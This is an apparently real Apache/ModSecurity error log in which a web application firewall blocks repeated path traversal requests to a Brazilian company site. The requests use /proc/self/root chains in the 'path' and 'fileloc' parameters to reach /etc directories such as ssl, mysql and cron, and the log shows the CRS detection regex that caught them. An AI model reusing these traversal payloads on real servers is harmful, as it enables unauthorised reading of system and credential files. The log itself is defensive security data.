[Mon Mar 16 22:25:05.195877 2026] [:error] [pid 2305:tid 140411699963648] [client 74.7.241.46:55982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitcQQohV2v-7oj5HG98wAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:25:09.876279 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.46:47798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitdaBJNF7axNlVR0W8HAAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:25:11.195209 2026] [:error] [pid 2304:tid 140411641214720] [client 74.7.241.46:47808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitd8h3JZxwdBQwPYGz1QAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:25:11.727695 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:33138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitd6BJNF7axNlVR0W8HgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:25:12.636147 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.241.46:47824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiteAQohV2v-7oj5HG99AAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:25:18.339810 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.241.46:47826] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitfu82sZHvlq4xgHqC7wAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:25:20.637264 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:33138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitgKBJNF7axNlVR0W8JgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:25:21.275465 2026] [:error] [pid 2304:tid 140411649607424] [client 74.7.241.46:54930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitgch3JZxwdBQwPYGz2AAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:25:22.954845 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.46:54942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitgqBJNF7axNlVR0W8JwAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:25:25.796416 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.243.203:59792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abithe82sZHvlq4xgHqC-AAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:25:26.132739 2026] [proxy_fcgi:error] [pid 2305:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58988] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:25:27.959589 2026] [:error] [pid 2304:tid 140411658000128] [client 74.7.241.46:54956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abith8h3JZxwdBQwPYGz3AAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:25:29.966746 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.243.203:59796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitiQQohV2v-7oj5HG9-wAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:25:48.125827 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59206] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:26:11.123265 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59452] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:26:15.167791 2026] [:error] [pid 2304:tid 140411590858496] [client 74.7.241.46:33762] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitt8h3JZxwdBQwPYGz_gAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:26:33.125980 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59648] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:26:55.133785 2026] [proxy_fcgi:error] [pid 2305:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59858] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:27:02.681671 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.241.46:57504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abit5gQohV2v-7oj5HG-HQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:27:04.568154 2026] [:error] [pid 2304:tid 140411607643904] [client 74.7.241.46:57502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abit6Mh3JZxwdBQwPYG0EwAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:27:17.128676 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:60056] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:27:21.366841 2026] [:error] [pid 2304:tid 140411548894976] [client 74.7.241.46:57510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abit-ch3JZxwdBQwPYG0IAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:27:39.103933 2026] [proxy_fcgi:error] [pid 2325:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60224] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:27:43.805055 2026] [:error] [pid 4740:tid 140411574073088] [client 74.7.241.46:53922] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuDwfYLcKp6Sb5AeL2AwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:27:45.627500 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:44502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuEQQohV2v-7oj5HG-JQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:27:48.325048 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.241.46:44504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuFO82sZHvlq4xgHqDOQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:27:50.072299 2026] [:error] [pid 4740:tid 140411683178240] [client 74.7.241.46:35058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuFgfYLcKp6Sb5AeL2BQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:01.125806 2026] [proxy_fcgi:error] [pid 4740:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60416] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:28:02.238722 2026] [:error] [pid 2305:tid 140411725141760] [client 74.7.241.46:35064] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 